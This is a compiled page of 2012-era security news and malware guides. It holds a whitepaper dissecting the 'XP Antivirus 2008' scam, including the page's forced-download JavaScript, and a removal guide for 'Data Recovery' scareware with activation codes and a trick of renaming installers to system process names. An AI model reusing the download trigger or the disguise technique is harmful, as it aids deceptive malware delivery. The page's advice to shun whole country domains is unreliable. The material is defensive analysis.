Microsoft Standalone System Sweeper Beta is not a replacement for a full antivirus solution providing ongoing protection; it is meant to be used in situations where you cannot start your PC due to a virus or other malware infection. It is a recovery tool that can help you start an infected PC and perform an offline scan to help identify and remove rootkits and other advanced malware. In addition, Microsoft Standalone System Sweeper Beta can be used if you cannot install or start an antivirus solution on your PC, or if the installed solution can't detect or remove malware on your PC.

Can not hurt to try

2nd Option

They advise you to fix the MBR and then use a recovery CD to restore your system to a pre-infected state (as sometimes restoring a system may not restore the MBR). To fix the MBR, we advise that you use the System Recovery Console, which supports a command called "fixmbr".

To find out how to use your system's recovery options, refer to the following article
For Windows 7: System Recovery Options in Windows 7…

[Sep 28, 2012] Adobe Revoking Code Signing Certificate Used To Sign Malware


wiredmikey writes

"Adobe said Thursday it will be revoking a code signing certificate next week after discovering two pieces of malware that had been digitally signed with Adobe's credentials. Two malicious utilities, pwdump7 v7.1 and myGeeksmail.dll, both came from the same source and were signed with valid Adobe digital certificates, Adobe's Brad Arkin said. Adobe plans to revoke the impacted certificate on Oct. 4. After initial investigation, the company identified a compromised build server which had been used to access the code signing infrastructure, Brad Arkin wrote in a blog post.

The build server did not have rights to any public key infrastructure functions other than the ability to issue requests to the signing service and did not have access to any Adobe products such as Flash Player, Adobe Reader, Shockwave Player, or Adobe AIR, Arkin said.

According to Adobe, most customers won't notice anything out of the ordinary during the certificate revocation process, but some IT administrators may have to take some actions in response."

Incredible pathetic (Score:5, Insightful)
by gweihir (88907) writes: on Thursday September 27, @09:45PM (#41484491)

If signing certificates for code do not even get basic certificate protection (standard infrastructure, but offline, and signing machine does nothing else but sign builds), then code signatures become not only worthless, they get negative worth, because they imply security where there is none.


If I found that one of my PGP keys were compromised, I would revoke it in less than 5 minutes. Why does it take a week to revoke a code-signing certificate? How much more damage might occur in that week?

[Sep 28, 2012] Smart-Grid Control Software Maker Hacked by timothy

September 27, 2012 | Slashdot
tsu doh nimh writes

"Telvent, a multinational company whose software and services are used to remotely administer and monitor large sections of the energy and gas industries, began warning customers last week that it is investigating a sophisticated hacker attack spanning its operations in the United States, Canada and Spain. Brian Krebs reports that the attacker(s) installed malicious software and stole project files related to one of Telvent's core offerings - OASyS SCADA - a product that helps energy firms mesh older IT assets with more advanced 'smart grid' technologies.

A follow-up story from got confirmation from Telvent, and includes speculation from experts that the 'project files' could be used to sabotage systems. 'Some project files contain the "recipe" for the operations of a customer, describing calculations and frequencies at which systems run or when they should be turned on or off. If you're going to do a sophisticated attack, you get the project file and study it and decide how you want to modify the pieces of the operation. Then you modify the project file and load it, and they're not running what they think they're running.'"

[Sep 11, 2012] Anatomy of a malware scam • by Jesper M. Johansson

This is a free whitepaper, but requires registration. Version provided here does not include any images.
August 22, 2008 | Reg Whitepapers

The evil genius of XP Antivirus 2008

Anyone who has a blog has probably seen blog spam; comments to the blog that simply try to entice people to go to some other site. Most of the time the site being advertised is simply trying to boost its search engine rankings to generate more ad revenue.

The more links there are to a site, the more popular the search engines figure it is, and the higher up in the search results it ends up. Blog spam, therefore, is frequently thought to be a good way to boost the search engine rankings. In some cases this turns malicious. Some sites engage in wholesale intellectual property theft to boost their rankings.

A few of weeks ago, however, I started noticing something far more insidious. I moderate all comments to my blog. This is something I started years ago to keep the blog somewhat family friendly, and to avoid propagating malicious content. Recently I also completely disabled trackbacks to avoid boosting the search engine rankings for sites that steal my work. This means I see every comment that comes into my blog. The other day I noticed one that contained nothing more than a link to a fake Google site: google-images.

This looked very suspicious to me so I made a note of it. Over the next several weeks I noticed a lot more of these, not only pointing to Google but also to Yahoo and MSN. The servers they pointed to all had the same basic structure, such as,,, etc. Every one resolves to the same IP address: That IP address is registered to in Singapore. The server appears to be hosted out of Kuala Lumpur. The domains, however, are registered in Ukraine: confirms this. You will soon see a related domain, That one is registered to Chebotarev Oleksandr, in Odessa, Ukraine. This had me very curious and I wanted to know more about what this site was attempting to achieve. Consequently, I fired up a virtual machine and started investigating. What I found was an interesting tale of trickery.

The First Hint

The first thing a potential victim would do is open up one of the sites. For my tests I used I did my initial test on Windows Vista. After various trickery, I got the dialog in figure 1.

Notice the chrome in Internet Explorer. My virtual machine is running Windows Vista. The popup, however, has the XP chrome. As it turns out, the popup is not a popup at all. The whole page is just one image, hyperlinked to a file download. I must give the criminals here credit for graying out the background to lend it credibility; a la Vista User Account Control (UAC). One of the questionable benefits of UAC is that it has conditioned people to believe that as long as the screen background is grayed out they can trust whatever is on the screen.

Before the popup in the screen shot there was actually another one too. That one was an animated GIF that looked like it was performing a virus scan of your computer. Needless to say, it found several pieces of fake malware on my computer, hence the dire warning in the fake popup.

If this looks suspicious to you, it should. We are not on We are on When you go to any of the sites that are linked in the blog comments you download a few files, and then it redirects you to, where the last part is some form of identifier that we will return to shortly.

Similar sites to this one have been reported at least as far back as 2003. The modus operandi does not change, although the exact details of what the sites do seem to. It appears likely that these sites are all related and that there are multiple fronts for them. appears to be hosted at an ISP in Pennsylvania at the time of this writing, but that is likely to change by the time you read this. In fact, between the time I started researching this and the time I wrote the article, the site name had changed to

Workflow Step by Step

At this point I was sufficiently curious to walk through the work-flow step by step. You may enjoy what I discovered. Starting from the beginning, when I first went to I received the warning in Figure 2.

It is quite nice of them to warn me about malware. It's also nice that they are offering to solve all my problems for free. Note also that I repositioned the dialogs in Figure 2 so you can better see what is happening. Without doing that the very small web browser window is actually hidden behind the dialog to make it look as if the dialog is coming from your computer, not a web page. If you click "OK" in figure 2, you get figure 3. If you click cancel, it just goes directly to a download for a fake anti-malware program.

The warning in figure 3 just lets you know that you are about to download something. Obviously the criminals are well aware that users are incredibly desensitized to warnings and the more warnings they get, the less they pay attention to them. Click OK in that warning, and you get the page in Figure 4.

Figure 4 is the same as Figure 1, but this time with the proper chrome as this virtual machine was running Windows XP. It turns out that the malware actually failed to install on Windows Vista (no, I did not file a bug with the authors to get that fixed), so I went back to Windows XP for my testing.

The page in Figure 4 is mostly just a composite of several images. The scan itself is a javascript that draws the progress bar. The file list that it iterates through when it performs the fake scan is a list of 1,100 names in a

Figure 1: The site issues a redirect to a different site

Figure 2: Initial warning

file called fileslist.js. That file also contains the 14 fake pieces of malware that it "discovers."

The warning dialog itself is a GIF image called popup3. gif. Virtually all areas of the page, including popup3. gif, are linked through an on-click event to a function called onloadExecutable(), which looks like this:

function onloadExecutable()


dat=new Date(1214372723);

var dlth=dat.getHours()-dat.getUTCHours();

rrc = 1;

location.href="../_download. php?aid=880421&dlth="+dlth;


This function does nothing more than trigger a download by setting the location of the browser to a script that initiates a download. The use of this design makes it harder to track down what they are doing since most forensics tools, such as wget, do not execute javascript. The objective, however, is quite clear: you are prompted to download something. The aid parameter is going to be appended to your download name as a version number. The time parameter does not seem to be used at all.

One very interesting behavior of popup3.gif is that the fake close button is actually linked to a special warning. If you click that button, you get the warning in Figure 5.

If you click OK in Figure 5 it runs the onloadExecutable() function. If you click cancel or close it throws another warning, shown in Figure 6. That warning will run onloadExecutable() no matter what you do; whether you click the OK button or the red X to close it.

Figure 6 Closing that warning brings up one that gives you no options

Therefore, no matter what you do, you will be prompted to download a file. The file is: http:// XPantivirus2008_v880421.exe. The v880421 part of the file is a fake version number which bubbled all the way from the original page. It does not seem to change very frequently. However, I tried a few hundred different numbers surrounding 880421 and most resulted in a valid download. Disturbingly, they all seem slightly different. It is possible that download.php runs the file through an obfuscator, but more than likely they have a few hundred different obfuscated versions of the same malware sitting on the server.

After downloading the file, I sent it to, a site that scans files on demand using a large number of reputable commercial anti-malware engines. The results varied a little depending on the day I tried it and which version of the file I sent them. For example, on June 24, only GData and Kaspersky detected the current version as malware. A version just a day older was also detected as malicious by AntiVir, eSafe, Sophos, and Webwasher-Gateway. The actual malware contained in the file is the Trojan-Downloader.Win32.FraudLoad. gen downloader trojan

Figure 3: The malware is independently certified

Figure 4: Fake Scan Results

Figure 5: Closing one warning brings up another

Figure 6: Closing that warning brings up one that gives you no options

Installing the Malware

The malware is actually quite well written, looking very professional. The installer starts out with a notification shown in Figure 7. It includes what appears to be a Windows compatibility logo, fake of course, and has a link to the terms and conditions.

The terms and conditions also look very professional. A snippet is shown in Figure 8.

The license agreement looks about like what you would expect from commercial software. Interestingly, however, it seems exclusively focused on the website, not on the software you are trying to install. It even tries to restrict how you can provide links to their site. That alone should be a reasonable hint, providing anyone actually ever reads license agreements.

The agreement also provides a link to the support site for the malware. A portion of the help file is shown in Figure 9.

Once you know this is malware, the help site is almost comical. It has information about bug reporting, conspicuously lacking an actual method to submit bug reports. It makes it clear how much you will be charged to install the malware, and even uses the boilerplate language about how safe it is to submit your credit card to them because no criminals will be able to read the encrypted transmission; until it reaches the criminals who asked for it, of course. There is even a link to an online support forum, shown in Figure 10.

The support forum looks well done, with mostly well designed graphics and the requisite list of cryptic malware names you find in the support forums for all anti-malware software. This list of malware is, of course, fake. However, it gives a nice view into what other sites might be associated with the same gang of criminals., antivirus-2008-pro. com,, winantispyware2008. com, and are just some of the sites advertising solutions to W32.Trojan.Downloader.s. In fact, 411-spyware has a thread on that particular fake threat ( w32-trojan-downloader-s).

Figure 7: The installer looks very professional

Figure 8 The malware comes with terms and conditions

Figure 9: The malware has everything, including a help site

Figure 10: The malware has a support forum

Sending Your Money to the Bad Guys

If you chose to actually pay for the software you will be directed to com. That site is hosted out of Bridgetown, Barbados. According to several websites, software-payment. com appears to be a bit of a favorite among those pushing fake anti-malware. This forum thread has a list of other fake anti-malware that used it for their billing services.

The software costs $49.95, as shown in Figure 9. However, when you try to register it you are also offered an upgrade to File Shredder 2008, for only $39.95. It is not clear whether that upgrade destroys your data only locally, or whether, for that fee, the bad guys will destroy your data securely on their own servers after they use it to steal your identity and your money. You may also add premium support for $24.95.

What it installs

The first thing you will notice after installation is that you are presented with the Windows Security Center, shown in Figure 11; except that it actually is not the Windows Security Center.

Figure 11 shows a fake Windows Security Center. It looks very much like the real thing, shown in Figure 12 on the same computer, at the same time, for comparison purposes. Note that the real one does NOT detect the malware as a legitimate anti-virus program. The primary differences are twofold. First, the recommendations link in the fake one is linked to a dialog that will try, once again, to make you purchase the fake anti-malware. In the real one, it links to a help document explaining how to obtain anti-malware software.

The fake Windows Security Center also has a list of resources on the left hand side. However, all of them are linked to documents that entice you to pay for the malware. In the real one they link to real help files. It is likely that the criminals created the fake Windows Security Center so they could control exactly what you saw when you clicked on anything in it and link it to the ubiquitous purchase screen. The real Windows Security Center is still present on the computer. Notice the Control Panel in Figure 13.

The real Windows Security Center is the one called just "Security Center" in the Control Panel. The fake one is the one called "Windows Security Center." In addition, the fake one identifies itself as "Windows Security Center" in the system tray. The real one identifies itself as "Security Alerts." It is probably safe to say that most users would be hard pressed to conclude that the real one was not the one called "Windows Security Center." Once again, it is a matter of telling real from fake, and in this case, unfortunately, the real thing, while there, is not very good at identifying itself as the real thing consistently.

Figure 11: Fake Windows Security Center

Figure 12: Real Windows Security Center

Figure 13: Fake Windows Security Center in the Control Panel

If you leave the computer alone for a few minutes you will eventually get the first of many many popups of various kinds, shown in Figure 14.

The warning in Figure 14 is yet another attempt at getting you to send your money to the criminals. If you click the "Remove all threats now" button it will take you to a purchase screen. Interestingly, the "Continue unprotected" button does not take you there, breaking with the previous history. If you use that button you will start getting system tray popups. An example is shown in Figure 15.

The malware uses several different system tray warnings. Another one is shown in Figure 16.

Interestingly, while virtually everything else the malware has shown us so far has been in flawless English, the system tray popups have grammatical mistakes and missing prepositions. More than likely this is indicative of collusion within a criminal gang to create the malware. The software and all the associated collateral is far too complex to be written by a single person in a reasonable time, so the source is likely a gang. The individual that wrote the system tray popups apparently did not receive the grammar tutorial the others did. Or, maybe, the system tray popups just were not part of the user acceptance testing plan.

Figure 14: The first of many warnings

Figure 15: One of several different scary looking system tray warnings

Figure 16: Another system tray warning

At regular intervals you also get a strange corner popup, shown in Figure 17.

The corner popup also shows up in the region of the system tray but is just a window. It has an "Update Now" button that takes you to the purchase site. Once again, the malware is specifically designed to entice you to pay for it.

The application itself looks reasonably good. Figure 18 shows the main application window during a "scan."

If you compare Figure 18 to your average legitimate anti-malware suite you would probably be inclined to agree that this looks perfectly legitimate to most people. It finds bad stuff, which is good, and the bad stuff is sufficiently scary sounding to make me want to get it removed, even if it costs me $49.95, plus the File Shredder 2008 license. Just in case that was not enough to entice me to purchase the malware, however, we also have the system status screen in Figure 19, which is designed to frighten you into compliance. By now you can probably guess where the "Update Now" button goes. There are at least four buttons in Figure 19 that lead to the "send us your money now" website. One can only marvel at how much better the criminals are at separating you from your money than the legitimate anti-malware vendors.

Interestingly, in my testing, the malware did not actually take any malicious action beyond what I have documented here. I did not detect any attempts at stealing data, at installing additional malware, or at remote control. This could be for several reasons. The purpose may just be to get some of your money, and maybe a credit card number. Alternatively, it may be that the software is time-triggered to make it harder to analyze. Most analysts do not have the luxury to let it run continuously for weeks whereas the bad guys can easily wait that long for the payout. Finally, the software may include detection logic to discover that it is running in a virtual machine, causing it to forego some of the malicious actions it otherwise would. Such logic is becoming more common in malware as it makes it far more difficult for researchers to analyze the software.

Figure 17: A corner popup

Figure 18: A scan of your system obviously finds many fake infections

Figure 19: The System Status screen is designed to be scary

Detection by Legitimate Software

As a final experiment I decided to see if I could remove the malware, or at least detect it, with legitimate anti- malware software. At first I attempted with the recently updated Microsoft Malicious Software Removal Tool (from June 24, 2008, the most recent available at the time I wrote this). It failed to detect the software.

Fortunately, other anti-malware software did detect it. Figure 20 shows the warning from AVG Free when you attempt to open the Control Panel applet. AVG Free also threw a similar warning when I downloaded the installer.

AVG also detects the other vectors installed by the malware and very efficiently removes them for you, as shown in Figure 21. I did not test with any other anti- malware software. As the test results on Virus Total showed, the malware would probably be missed by at least some legitimate anti-malware software.

Figure 20: AVG Free detects the malware on open

Figure 21: AVG Free removes the malware


This type of malware is very, very disturbing. One can only wonder how many users have been duped into installing ineffective security software, and what happened to their private information and credit card data when they paid for it. The presence of such software, and the overall very high quality of the ruse it presents, is frightening. More than likely, thousands of people have been fooled. In fact, this type of deception has been around for several years now, and it would not still be here if it did not work well.

This should serve as a dire warning to all: be extremely careful what you trust, and question everything that looks even remotely suspicious. For example, no website can run an anti-malware scan on your computer simply by your visiting the site. Any site that purports to do so is almost certainly run by criminal gangs.

No website should ever offer you to download an anti-malware package as soon as you visit the site. Any site that purports to do so is either run by criminal gangs or by an organization whose business practices are so deceptive that you should never consider doing business with it. A reputable site will present you with product information and then leave the downloading decision up to you, not force it upon you. No software that pushes the purchase decision so heavily in your face is likely to be legitimate.

Finally, learn just a little about how your computer looks normally so you can detect changes. The fake Windows Security Center is a very nice touch that could fool almost anyone except who doesn't pay attention to what the real one looks like and is called.

As for your anti-malware software, yes you need it. We all really do, at least on some computers. Advocating that you should stop using anti-malware software is irresponsible. If people were to actually take that advice, we would be overrun with malware in short order. You should definitely have anti-malware software on any computer that may come into contact with untrusted data and software.

However, do not just pick software because it tells you do pick it. Stick to the trusted brand names when it comes to anti-malware. And, if you get a download shoved down your computer when you visit a website, head over to Virus Total and submit it for a scan. If it proves malicious, they will submit it to the anti-malware vendors for you.

Jesper M. Johansson is a Software Architect working on security software and is a contributing editor to TechNet Magazine. He holds a Ph.D. in Management Information Systems, has more than 20 years experience in security, and is a Microsoft Most Valuable Professional (MVP) in Enterprise Security. His latest book is the Windows Server 2008 Security Resource Kit.

[Sep 10, 2012] Search results may deliver tainted links by Byron Acohido

According to Blue Coat Security Lab users are four times as likely to be infected by compromised search results when compared to spam emails.
6/17/2012 | USA TODAY

Internet search results have surpassed e-mail as the main way cybercriminals attempt to victimize Internet users.

That's the upshot of an analysis of Web traffic from more than 75 million users on home and corporate networks conducted by Blue Coat Security Lab.

Researchers found criminals are poisoning the search results consumers receive when searching on Google, Bing, Yahoo and other search services - and at a rate four times more frequently than they are sending tainted links through e-mail.

The end game in each case is to get you to fall for scams or to infect and take control of your PC. "Searching is at least as dangerous as going into your e-mail in-box and clicking on things," says Chris Larsen, Blue Coat's chief malware expert.

Crooks know that every minute of every day hundreds of millions of people worldwide use search engines "mentally predisposed to click on things because we're exploring," says Larsen. The bad guys may be turning to tainted search results because e-mail defenses have gotten tighter, and most people are on the lookout for suspicious messages, says Peter Cassidy, secretary general of the Anti-Phishing Working Group.

Sometimes the tainted Web links show up when users search for information about major news events or celebrities. But increasingly, they are also surfacing in search results for hundreds of mundane topics, such as recipes and sample letters, Larsen says.

Google and Microsoft, which supplies the search engine for Bing and Yahoo search services, are pouring resources into eradicating poisoned search results. "A combination of automated and manual processes helps us respond quickly to evolving threats and stay a step ahead," says Matt Cutts, who heads up Google's "Webspam" team.

Even so, attacks continue to get through. In 2011, 26 million new samples of malicious software were detected on the Internet. And an estimated 39% of the world's PCs are currently infected, according to the Anti-Phishing Working Group.

Poisoned search results add to the mix of bad things lurking on the Internet. Consumers can protect themselves by being wary of certain Web address endings. As a rule, it is wise to avoid clicking on links that include ".ru" (Russia) or ".cn" (China) in the address line, since attacks often originate from those nations.

Google: 12 To 14 Million Searches Per Day Returned Hacked Sites by Barry Schwartz

Jun 19, 2012

Google's security blog announced today several updates on how they have been addressing malware and hacked sites on the internet.

Google said that between 12 and 14 million search queries per day return warnings that at least one of the results listed in the Google search results were compromised. Google has two types of labels for sites that were hacked, either they are listed as compromised or as harmful. The difference is that compromised sites are hacked and the content and links may have changed but they are likely not harmful to the searcher to click on them. The harmful warning is an extended warning that says if you go to the web site, your computer may be infected with malware.

Google finds about 9,500 new malicious websites every day and sends "thousands of notifications daily to webmasters."

[Aug 21, 2012] Battling Zombies and Botnets -

The Obama administration and major industry groups unveiled a new initiative Wednesday to battle the increasing number of networked computers that are being transformed into botnets.

A botnet is a collection of computers that have been made into the tech equivalent of zombies -- computers that have been taken over remotely by a third party genearlly to conduct malicious online activities such as spread viruses, overload servers, and spread spam, among other things. It is estimated that 1 in 10 computers in the U.S. could be a zombie member of a botnet.

The initiative this week had three significant parts:

Botnets are not new but as more and more individuals go online, the potential damage from them increases significantly. In addition, the culling of data from botnets affects efforts to protect consumers from data theft and identity fraud.

While there have been numerous initiatives and campaigns around cybersecurity -- many of which have begun only to fizzle out -- the creation of the botnet initiative has merit. Botnets are very much the enemy within us (in cyberspace) that are harmful not only to the infected computers but to the larger networked community. The more information the government and companies can share about botnets, the more likely we can start de-zombifying infected computers.

[Jul 30, 2012] Data Recovery Trojan

You need to understand that you are dealing with professionals. Criminal professionals and as such you are outgunned. Traditional methods of malware disinfection will eventually work but do you have time to wait when they will debug their staff?

So using recovery based on the drive image is the only reasonable strategy that works. There two options here

  1. Use Windows system restore. Restart your computer then Press F8 key and then select Safe Mode... Then, run 'restore' restore options will be listed based on dates - then select your desired restore option - then wait till the process finish. Learn as much as you can about this Windows mechanism and try it first For more about Restore points see System Restore - Windows 7 features
  2. Use of Softpanorama Malware Defense Strategy. This is probably the best option for complex infection with root-kit elements present like this one. And it does not rely of some super-duper AV program that known that strain of the malware that you got. It just presume that you regularly backup your C partition on a USB or network drive with Acronis True Image, Ghost or other "ghosters" created image of your C partition. And now when the disaster had stricken you have one, not too old image available for recovery.

Preliminary steps to help to recover your data hijacked by the Trojan:

There are two traditional approaches which might help at least to alleviate some pain. I would like to stress that here the main problem here is the infection with Win32:Sirefef, not so much the Data Recovery scareware. And here you need to know quite a lot about Windows to disinfect it correctly and prevent reinfection. Just running "super-duper" antivirus program usually is not enough. Combination of those programs might help. I would recommend two options:

[Jul 29, 2012] How to Remove Data Recovery Malware

This scareware program is bundled with a rootkit Win32:Sirefef – a family of malware that controls infected computer's Internet activities by redirecting requested URL to a different one. I recommend to use Softpanorama Malware Defense Strategy booting from the recovery CD. You can also use system restore. Restart your computer then Press F8 key and then select Safe Mode... Then, run 'restore' restore options will be listed based on dates - then select your desired restore option - then wait till the process finish.
April 28, 2012

Data Recovery is scareware masquerading as computer repair and optimization program. It pretends to scan your computer for hard drive, RAM and Windows registry errors and displays fake warnings. None of this is really surprising, or at least it shouldn't because it's a typical scareware. Cyber crooks behind Data Recovery just want to trick as many internet users as possible into paying for bogus computer repair program. This scareware is usually installed by the user when visiting infected/malicious websites or opening infected attachments. Malware authors use social engineering and drive-by downloads to distribute this malicious software too. Once installed, you may be requested to pay to fix supposedly detected critical hard drive errors and RAM failures. Just ignore those fake warnings and notifications about non-existent problems and uninstall Data Recovery from your computer. Of course, it's easier said than done, so to remove this malware from your computer, please follow the removal instructions below.

When running, Data Recovery will report the following problems on your computer:

It detects 14 errors on each infected computer. It doesn't matter whether is a brand new PC or and old laptop. All the errors and warnings are predetermined, so don't get spooked. Data Recovery is more annoying than dangerous, however, there's one this that shouldn't be overlooked. The rogue program hides certain files, usually shortcuts and Desktop icons, and moves other files to Windows %Temp%\smtmp folder.

Do not delete any files from your Temp folder; otherwise you'll have to use Windows CD/DVD to restore your system. Thankfully, you can unhide your files rather easily. Just follow the removal instructions below.

It is also worth mentioning that Data Recovery executable drops a rootkit from the TDSS family. If you don't remove the rootkit the rogue application will be re-installed.

Fake Data Recovery warnings:

Additionally, you can activate the rogue program by entering this registration code 15801587234612645205224631045976 08869246386344953972969146034087 and any email as shown in the image below. Once this is done, you are free to install anti-malware software and remove the rogue anti-virus program from your computer properly.

That's probably the most easiest way to remove Data Recovery malware: enter the code and then run a full system scan with recommended anti-malware software (Spyware Doctor). You can also remove malicious files manually. One way or another, please follow the steps in the removal guide below. And of you have already purchased this bogus computer repair program, please contact your credit card company immediately and dispute the charges. Next time purchase software from reputable vendors only and keep it up to date. If you need help removing Data Recovery, please leave a comment below or email us. Good luck and be safe online!

Quick removal:

1. Use debugged registration key and fake email to register Data Recovery malware. This will allow you to download and run any malware removal tool you like and restore hidden files and shortcuts. Choose to activate "Data Recovery" manually and enter the following email and activation code: 08869246386344953972969146034087 (new code!) 1203978628012489708290478989147 (old code, may not work anymore)

2. Download TDSSKiller and run a system scan. Remove found rootkits as shown in the image below. Reboot your computer if required.

3. Download recommended anti-malware software (Spyware Doctor) and run a full system scan to remove this virus from your computer.

Alternative Data Recovery removal instructions:

1. First of all, you need to unhide the files and folders. Select Run... from the Start Menu or just hit the key combination CTRL+R on your keyboard. In the Open: field, enter cmd and hit Enter or click OK.

At the command prompt, enter attrib -h /s /d and hit Enter. Now, you should see all your files and folders. NOTE: you may have to repeat this step because the malware may hide your files again.

If you still can't see any of your files, Select Run... from the Start Menu or just hit the key combination CTRL+R on your keyboard. In the Open: field, enter explorer and hit Enter or click OK.

2. Open Internet Explorer. Select Run... from the Start Menu or just hit the key combination CTRL+R on your keyboard. In the Open: field, enter iexplore.exe and hit Enter or click OK.

Open Internet Explorer and download TDSSKiller or Backdoor.Tidserv Removal Tool. This malware usually (but not always) comes bundled with TDSS rootkit. Removing this rootkit from your computer is very important (if exists). Run TDSSKiller or Backdoor.Tidserv Removal Tool to remove the rootkit.

3. Finally, download recommended anti-malware software (Spyware Doctor) to remove this virus from your computer.

NOTE: in some cases the rogue program may block anti-malware software. Before saving the selected program onto your computer, you may have to rename the installer to iexplore.exe or winlogon.exe With all of these tools, if running Windows 7 or Vista they MUST be run as administrator. Launch the program and follow the prompts. Don't forget to update the installed program before scanning.

Alertane Data Recovery removal instructions:

1. First of all, you need to unhide the files and folders. Select Run... from the Start Menu or just hit the key combination CTRL+R on your keyboard. In the Open: field, enter cmd and hit Enter or click OK.

At the command prompt, enter attrib -h /s /d and hit Enter. Now, you should see all your files and folders. NOTE: you may have to repeat this step because the malware may hide your files again.

2. The rogue application places an icon or your desktop. Right click on the icon, click Properties in the drop-down menu, then click the Shortcut tab.

The location of the malware is in the Target box.

On computers running Windows XP, malware hides in: C:\Documents and Settings\All Users\Application Data\

NOTE: by default, Application Data folder is hidden. Malware files are hidden as well. To see hidden files and folders, please read Show Hidden Files and Folders in Windows.

Under the Hidden files and folders section, click Show hidden files and folders, and remove the checkmark from the checkbox labeled:

- Hide extensions for known file types - Hide protected operating system files

Click OK to save the changes. Now you will be able to see all files and folders in the Application Data directory.

On computers running Windows Vista/7, malware hides in: C:\ProgramData\

3. Look for suspect ".exe" files in the given directories depending on the Windows version you have.

Example Windows XP: C:\Documents and Settings\All Users\Application Data\6DSS92c31Apgjk.exe C:\Documents and Settings\All Users\Application Data\ixgPHgbBMPf.exe

Example Windows Vista/7: C:\ProgramData\6DSS92c31Apgjk.exe C:\ProgramData\ixgPHgbBMPf.exe

Basically, there will be a couple of ".exe" file named with a series of numbers or letters.

Rename those files to 6DSS92c31Apgjk.vir, ixgPHgbBMPf.vir etc. For example:

It should be: C:\Documents and Settings\All Users\Application Data\6DSS92c31Apgjk.vir

Instead of: C:\Documents and Settings\All Users\Application Data\6DSS92c31Apgjk.exe

4. Restart your computer. The malware should be inactive after the restart.

5. Open Internet Explorer and download TDSSKiller or Backdoor.Tidserv Removal Tool. This malware usually (but not always) comes bundled with TDSS rootkit. Removing this rootkit from your computer is very important (if exists). Run TDSSKiller and remove the rootkit.

6. Download recommended anti-malware software (Spyware Doctor) to remove this virus from your computer

NOTE: in some cases the rogue program may block anti-malware software. Before saving the selected program onto your computer, you may have to rename the installer to iexplore.exe or winlogon.exe With all of these tools, if running Windows 7 or Vista they MUST be run as administrator. Launch the program and follow the prompts. Don't forget to update the installed program before scanning.

Associated Data Recovery files and registry values:


Windows XP:

  • %AllUsersProfile%\Application Data\[SET OF RANDOM CHARACTERS]
  • %AllUsersProfile%\Application Data\[SET OF RANDOM CHARACTERS].exe
  • %UsersProfile%\Desktop\Data Recovery.lnk
  • %UsersProfile%\Start Menu\Programs\Data Recovery\
  • %UsersProfile%\Start Menu\Programs\Data Recovery\Data Recovery.lnk
  • %UsersProfile%\Start Menu\Programs\Data Recovery\Uninstall Data Recovery.lnk %AllUsersProfile% refers to: C:\Documents and Settings\All Users %UserProfile% refers to: C:\Documents and Settings\[User Name]

    Windows Vista/7:

    Registry values:


    My thanks as well. I was able to get rid of the malware too. An additional comment to others is that in my case the files in my Temp folder (as described above) were taken from the Start Menu Programs folder from both my personal profile and the All users profile. Hope this helps.


    Thanks very much for this post. I couldn't find anything on this -ware because it was so new. I searched for the 6DSS92c31Apgjk.exe on Google and found this. I'll check this blog out more often. Cheers!

    Also, for those that cannot connect to the internet on wi-fi, try plugging into the wireless router, make sure you are connected locally (On the status bar, bottom-right, near the clock, right-click the symbol for the internet connection and click on "Open Network Connections [This is for XP users...sorry Vista, etc. users]) and make sure that your local connection is good).

    If you cannot connect, you might want to connect to the internet using another computer. (And if you're trying to use the activation code, I hope someone else can help).

    Good luck, all!

    Hi again, I used TDSSKiller as you said to. It found a rootkit and removed it immediately. Thanks so much!

    This blog has saved my computer!

    Thanks. You and your blog helped me! I had a new exe file (bPxedpkqwSG.exe), but I renamed files, run TDSSKiller, MalwareBytes, and my system is back! THANK YOU!

    I have to change the screen-resolution, and un-hide the files.

    I have a daily updated NOD Internet Security, so I'm very upset! :S

    1 thread found: Locked file, Service: sptd. " As for this problem , I had the same and I tried to remove it manually (in the section "alternate data recovery removal instruction") and it worked. And then I downloaded one of the anti-malware software which is mentioned above then I let it scan my computer ,it removed all of the malwares.
    Hi, I think the rogue program came bundled with a rootkit. Please run TDSSKiller by Kaspersky first. If you can't run it in Normal Mode, please reboot your computer in Safe Mode.


    Well, I guess it was the Canadian Pharmacy e-mail I received and opened, too ignorant to know what I had done to myself.

    I lost all icons on my Desktop, I don't have access to the command prompt, not even with Control +R, nothing is appearing on my Drive C, and there is no Windows key on my laptop. Thus, I can't perform any of the suggestion and solutions being so generously shared here. I did get IE back on my Start Menu, but not Firefox, which I prefer. When I reboot, Yahoo Messenger does open.

    Being on a fixed income, I just can't afford to buy any additional software. What can I do? Your help is appreciated. Thank you.


    May I suggest before doing any of the above try to do SYSTEM RESTORE if possible. I tried to remove it manually but yet couldn't get start menu to show up despite trying unhide.exe. The system restore helped me. Thankfully my system was restored to just a day before so didn't lose much of work. Hope it helps!
    I didn't think I was able to resolve this one, but, I followed directions! Installed TDSSKiller & MalwareBytes in Safe Mode, Click Scan and deleted the files it recommended. Then, started in Normal Mode, notice all shortcuts and desktop icons we're gone. Downloaded Unhide.exe, ran the program and BooM! all icon/shortcuts we're back! Fully Restored! Easy!
    I downloaded all the files that were on this blog and installed them on my computer. They all worked and my computer is fixed, but the overall style of my computer is different. Not only that, but I can't use the internet, I can't play audio files on my computer, I can only open certain files. What do I do? Don't want to take it to the geek squad because I don't feel like spending $80 to get this fixed. Can you help me?
    This is what I did to avoid the virus regeneration ( for Windows XP):

    1) ...enter attrib -h /s /d and hit Enter. Now, you should see all your files and folders.

    2) Then you will find the rogue application places an " system check" icon on your desktop.

    3) Right click on that icon, click "Properties" in the drop-down menu, then click the "Shortcut" tab.

    4)in that same window, click the bottom left tab " Find Folders" ( sorry I forgot the exact name). You will get a new window " Application Data"

    5) check carefully under this "Application Data" window, you'll find some suspicious .exe files,

    6)Rename those files by changing the .exe to .vir

    Now, you can restart your computer. The malware should be inactive after the restart.

    Hope this helps, Good Luck!

    ok I already got it , after removing the virus use the unhide program it might take few attempts as soon as you recover your desktop icons then go on the star button maybe options might be missing jus press right click , go to properties , then go to reestablished settings and there ya go xD sorry for my bad punctuation
    just a quick one for anyone want to try an alternative resolution.

    Restart your computer then Press F8 key and then select Safe Mode... let it run

    Then, run 'restore' restore options will be listed based on dates - then select your desired restore option - then wait till the process finish.

    please note: am running windows 7, after I restored my system it come back to normal except that some files (not really important) has been deleted.

    before opening any browsers in my computer I have to do Windows update specially the Security Essentials.

    Good luck!

    I just got hit by this thing hours before an exam was due. Broke into a sweat before I found this page. You saved my life. Thank you.
    I would honestly kill one of these SOB's for all the time I've lost to crapware like this over the years. I do desktop IT support for my company and regardless of the AV product we use inevitably these things get in anyways.
